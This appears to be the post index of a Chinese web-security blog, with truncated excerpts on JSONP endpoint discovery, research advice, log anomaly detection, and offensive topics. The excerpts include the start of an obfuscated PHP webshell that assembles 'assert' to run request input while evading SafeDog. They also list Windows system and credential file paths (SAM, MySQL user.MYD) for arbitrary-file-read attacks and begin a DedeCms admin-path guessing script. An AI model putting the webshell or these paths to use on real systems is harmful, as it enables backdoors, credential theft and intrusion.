JSONP接口探测插件编写思路
2019 年 8 月 8 日 / 作者: Jeary / 标签: 前端 跨域 Web安全
最近有机油有挖掘jsonp接口的需求,最原始的办法就是对每一个页面进行XHR的请求查看,并观察接口是否为jsonp
根据已知经验,我们可以得出:
1.JSONP接口为XHR请求
2.通常URI中有callback参数或者其他可控参数
3.响...
Web安全研究人员是如何炼成的
2018 年 11 月 29 日 / 作者: Jeary / 标签: 网络安全 Web安全
原文:https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher
序
您是否有志于推动Web安全技术的发展,并与信息安全社区分享相关知识呢?在这篇文章中,我将为读者分享与Web安全研究有关的各种建议,当然,这些建议...
Php Webshell ByPass SafeDog
2018 年 5 月 31 日 / 作者: Jeary / 标签: Web安全 Webshell
记录一些php webshell代码
最新版安全狗扫描结果:
下面是代码,代码顺序为图中顺序:
<?php
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
$func($_REQU...
DedeCms后台猜解
2018 年 4 月 27 日 / 作者: Jeary / 标签: Web安全 dedecms 后台
网上流传的一个找后台的姿势,记录一下:
<?php
$domain='http://localhost/dedecms/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = '') {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_P...
任意文件读取常见利用路径
2018 年 4 月 27 日 / 作者: Jeary / 标签: 漏洞 网络安全 Web安全
C:/boot.ini //查看系统版本
C:/WindowsSystem32inetsrvMetaBase.xml //IIS配置文件
C:/Windowsrepairsam //存储系统初次安装的密码
C:/Program Filesmysqlmy.ini //Mysql配置
C:/Program Filesmysqldatamysqluser.MYD //Mysql root
C:/Windowsphp.ini //php配置信息
C:/Windowsmy.ini //...
使用K-means对网站访问者进行聚类
2018 年 1 月 23 日 / 作者: Jeary / 标签: 记录 数据检索 网络安全 日志分析 Web安全 数据分析
在分析Web日志流程中,寻找可疑请求、寻找异常访问者为分析流程中的基础流程,传统的做法是使用正则进行筛选,而这些正则则是通过我们已知的安全经验编写出来的,此时我们可以通过尝试一些新的方法~
一、数据准备
同...
使用LOF(Local Outlier Factor)异常检测算法检测异常访问者
2018 年 1 月 23 日 / 作者: Jeary / 标签: 折腾 数据检索 日志分析 Web安全 数据分析
在日常日志分析中,我们通常使用自己的“安全经验”编写出关于攻击的一些规则去寻找日志中攻击行为,从而得到一段时间内的异常访问者IP,即所有“命中过规则”的访问者,而面对千变万化的Web应用、不断更新迭代的技...
